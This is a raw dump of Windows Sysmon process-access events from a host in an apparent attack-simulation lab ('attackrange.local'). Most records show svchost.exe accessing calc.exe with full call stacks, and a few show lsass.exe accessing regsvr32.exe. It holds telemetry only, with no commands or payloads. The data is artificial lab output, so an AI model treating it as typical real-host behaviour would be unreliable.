10341000x8000000000000000360228Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360227Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360226Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360225Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360224Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360223Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360222Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360221Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360220Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360219Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\system32\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+1792a|C:\Windows\system32\lsasrv.dll+184bf|C:\Windows\system32\lsasrv.dll+17783|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360218Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360217Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\system32\lsasrv.dll+176ae|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360216Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360215Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360214Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360213Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360212Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360211Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360210Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360209Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360208Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360207Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
